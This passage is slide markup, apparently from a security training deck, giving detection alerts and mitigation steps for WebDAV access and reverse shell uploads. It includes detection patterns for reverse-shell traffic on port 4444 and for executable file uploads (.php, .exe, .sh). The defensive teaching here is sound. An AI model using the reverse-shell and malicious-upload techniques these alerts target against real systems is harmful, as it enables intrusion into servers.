              <a:t>WebDAV Access</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1432" name="Google Shape;1432;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433" name="Google Shape;1433;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1752150"/>
            <a:ext cx="4596300" cy="31755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i="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lert 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is watching for: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⧫ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t>HTTP requests GET, PROPFIND,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1700"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t>or PROPPATCH</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000" lang="en" sz="1700"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t> to this directory, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1700"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t>from unknown IPs</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>--- --- --- ---</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lert 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is watching for: </a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⧫ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User authentication error of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“401 Unauthorized” (access attempt)</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1434" name="Google Shape;1434;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="4677300" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Require multi-factor authentication for access</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr b="1" sz="800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>Switch to SecureWebDAV </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800" u="sng"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>use the security settings offered, including file </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>permissions</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t> and access</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000" lang="en" sz="1800"/>
              <a:t>4</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" baseline="30000" lang="en" sz="1800"/>
            </a:br>
            <a:endParaRPr b="1" baseline="30000" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>Get SSL certification for your site and use HTTPS to set up the network connec</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>tion</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000" lang="en" sz="1800"/>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr baseline="30000" sz="18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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1435" name="Google Shape;1435;p87"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="400050" y="847725"/>
            <a:ext cx="2762400" cy="590400"/>
            <a:chOff x="400050" y="847725"/>
            <a:chExt cx="2762400" cy="590400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1436" name="Google Shape;1436;p87"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="400050" y="847725"/>
              <a:ext cx="2762400" cy="590400"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd fmla="val -20833" name="adj1"/>
                <a:gd fmla="val 62500"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7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="962025" y="884025"/>
              <a:ext cx="149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Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:cs typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>Detection</a:t>
              </a:r>
              <a:endParaRPr sz="2600">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1438" name="Google Shape;1438;p87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4905375" y="847725"/>
            <a:ext cx="2762400" cy="590400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd fmla="val -20833" name="adj1"/>
              <a:gd fmla="val 62500" name="adj2"/>
              <a:gd fmla="val 0" name="adj3"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D7E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Prevention</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1439" name="Google Shape;143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Mitigation … Reverse Shell Uploads</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1445" name="Google Shape;1445;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446" name="Google Shape;1446;p88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="4677300" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600"/>
              <a:t>Limit outgoing connectivity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1600"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>with firewall rules</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1600"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600"/>
              <a:t>Use multifactor authentication for </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600"/>
              <a:t>file uploads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>to the webDAV server</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1600"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600"/>
              <a:t>Only allow whitelisted IPs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>to upload files </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1600"/>
              <a:t>(if needed at all)</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1600"/>
            </a:br>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600"/>
              <a:t>Educate system users</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1600"/>
            </a:br>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Consider using a</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600"/>
              <a:t> proxy server</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000" lang="en" sz="1600"/>
              <a:t>6</a:t>
            </a:r>
            <a:endParaRPr baseline="30000" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1447" name="Google Shape;1447;p88"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="400050" y="847725"/>
            <a:ext cx="2762400" cy="590400"/>
            <a:chOff x="400050" y="847725"/>
            <a:chExt cx="2762400" cy="590400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1448" name="Google Shape;1448;p88"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="400050" y="847725"/>
              <a:ext cx="2762400" cy="590400"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd fmla="val -20833" name="adj1"/>
                <a:gd fmla="val 62500"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8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="962025" y="884025"/>
              <a:ext cx="149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Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:cs typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>Detection</a:t>
              </a:r>
              <a:endParaRPr sz="2600">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1450" name="Google Shape;1450;p88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4905375" y="847725"/>
            <a:ext cx="2762400" cy="590400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd fmla="val -20833" name="adj1"/>
              <a:gd fmla="val 62500" name="adj2"/>
              <a:gd fmla="val 0" name="adj3"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D7E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Prevention</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1451" name="Google Shape;1451;p88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1634050"/>
            <a:ext cx="4905300" cy="30867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i="1" lang="en" sz="1800"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1700"/>
              <a:t>lert 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1700"/>
              <a:t>is watching for: </a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1700"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⧫ A company server is the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>source.IP</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⧫ Unknown IP is the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>destination.IP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⧫ T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>he </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>traffic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is on </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>port 4444</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>--- --- --- --- </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alert 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is watching for:  </a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⧫ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File uploads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> from outside the company</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--- --- --- ---</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alert 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is watching for:  </a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⧫ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File uploads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>with any executable extension, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>such as .php, .exe or .sh</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="14"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1452" name="Google Shape;145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Mitigation ... User Cybersecurity Awareness</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1458" name="Google Shape;1458;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459" name="Google Shape;1459;p89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="49881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800"/>
              <a:t>Training in basic cybersecurity measures,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> including:</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>How to choose secure passwords</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
